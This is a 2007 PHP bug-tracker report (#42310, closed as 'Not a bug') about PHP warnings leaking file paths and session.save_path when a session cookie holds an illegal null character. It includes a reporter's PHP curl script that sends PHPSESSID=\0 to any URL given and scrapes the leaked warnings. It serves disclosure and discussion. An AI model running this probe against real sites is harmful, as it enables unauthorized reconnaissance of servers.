PHP :: Bug #42310 :: Information disclousre when using invalid symbol in the session id

Bug #42310

Information disclousre when using invalid symbol in the session id

Submitted:

2007-08-15 13:28 UTC

Modified:

2007-08-15 18:53 UTC

Votes:	3
Avg. Score:	5.0 ± 0.0
Reproduced:	2 of 2 (100.0%)
Same Version:	2 (100.0%)
Same OS:	2 (100.0%)

From:

astalor at gmail dot com

Assigned:

Status:

Not a bug

Package:

Session related

PHP Version:

5.2.4RC1

OS:

ALL

Private report:

CVE-ID:

None

View Add Comment Developer Edit

[2007-08-15 13:28 UTC] astalor at gmail dot com

Description:
------------
If you put invalid symbol in the session ID and PHP warnings are turned on you can retrieve information about files and paths on the server and also in some cases the configured session.save_path variable from PHP.INI, this can display warnings (and sometimes break pages that count on redirection with header()) on pages that are perfectly correct and without any errors in them.

Reproduce code:
---------------
<?php
/* This script check if PHP warnings are enabled for the targeted website */
function checkWarnings($url) {
	$ch = curl_init ();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_TIMEOUT, 2);
	curl_setopt($ch, CURLOPT_COOKIE,"PHPSESSID=\0");
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HEADER , 1);
	$output = curl_exec($ch);
	curl_close($ch);
	
	preg_match_all("/<b>Warning<\/b>:(.*)<br \/>/i",$output,$match);
	preg_match_all("/session.save_path is correct \((.*)\)/i",$output,$path);
	#echo $output;
	echo "<pre>";
	echo "Checking <b>$url</b>\n";
	if (count($match[0]) > 0) {
		echo "<b>Warnings found</b>:\n";
		echo implode("\n",$match[0]);
	} else {
		echo "Warning are <b>disabled</b>\n";
	}
	if ($_GET['debug'] == 1) {
	echo "<b>Displaying page:</b>\n";
	echo $output;
	}
	#print_r($path);
}
checkWarnings($_GET['url']);
?>

Expected result:
----------------
Warning:  session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/user/public_html/main/file.php on line 32
Warning:  Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0


Actual result:
--------------
the same as the expected result, as long as the PHP warning are enabled

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2007-08-15 15:42 UTC] jani@php.net

Please try using this CVS snapshot:

  http://snaps.php.net/php5.2-latest.tar.gz
 
For Windows (zip):
 
  http://snaps.php.net/win32/php5.2-win32-latest.zip

For Windows (installer):

  http://snaps.php.net/win32/php5.2-win32-installer-latest.msi

[2007-08-15 18:53 UTC] johannes@php.net

Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

Well, if display of errors is activated we give the error message. As usual user data should be filtered by you before doing anything with them and display_Errors should be disabled on production system...

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Tue Apr 30 00:01:30 2024 UTC